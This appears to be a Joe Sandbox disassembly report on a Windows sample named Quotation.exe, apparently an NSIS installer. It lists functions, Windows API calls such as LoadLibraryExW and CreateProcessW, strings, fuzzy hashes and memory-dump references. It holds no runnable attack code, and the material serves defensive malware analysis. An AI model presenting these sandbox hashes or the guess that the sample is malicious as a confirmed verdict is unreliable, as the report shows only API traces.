API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$<Py
API String ID: 999035486-2352372732
Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

UXTHEME, xrefs: 0040618B
%s%S.dll, xrefs: 004061C9
\, xrefs: 004061A4

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406A50
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406A6B

Strings

n, xrefs: 00406A42
a, xrefs: 00406A49
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3085344383
Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

UXTHEME, xrefs: 004068C4, 004068D1, 004068DC
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
GetLastError.KERNEL32 ref: 00405E67
SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
GetLastError.KERNEL32 ref: 00405E8E

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
RegCloseKey.KERNELBASE(?), ref: 004069A7

Strings

Call, xrefs: 0040695A

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00405E04
GetLastError.KERNEL32 ref: 00405E0E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1375471231-3081826266
Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8

Function 6FC9167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 6FC92351: GlobalFree.KERNEL32(?), ref: 6FC92A44
Part of subcall function 6FC92351: GlobalFree.KERNEL32(?), ref: 6FC92A4A
Part of subcall function 6FC92351: GlobalFree.KERNEL32(?), ref: 6FC92A50

GlobalFree.KERNEL32(00000000), ref: 6FC91738
FreeLibrary.KERNEL32(?), ref: 6FC917C3
GlobalFree.KERNEL32(00000000), ref: 6FC917E9

Part of subcall function 6FC91FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC91FFA

Part of subcall function 6FC917F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FC91708,00000000), ref: 6FC9189A

Part of subcall function 6FC91F1E: wsprintfW.USER32 ref: 6FC91F51

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 286e130011ef414a8e895afe5825b6d6be3bfa632d63349de7c2f92867a4c6d8
Instruction ID: 2d93aa41efefd0ae09f9729357a435e7f971d7b05f0009c420c5774c2f7fcfe4
Opcode Fuzzy Hash: 286e130011ef414a8e895afe5825b6d6be3bfa632d63349de7c2f92867a4c6d8
Instruction Fuzzy Hash: 1141A23640434AEFDB209F2CC886BDA37FCBB41325F00451AF99D9A582FB75A648C661

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C

Function 00406616 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,74DF3420,?), ref: 00406BB2
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406DBC

lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,74DF3420,?), ref: 0040666A
GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
String ID:
API String ID: 1879705256-0
Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D

Function 004066B4 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
CloseHandle.KERNEL32(?), ref: 004066EA

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79

Function 004068F9 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15

Function 6FC92D14 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?), ref: 6FC92DD3

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
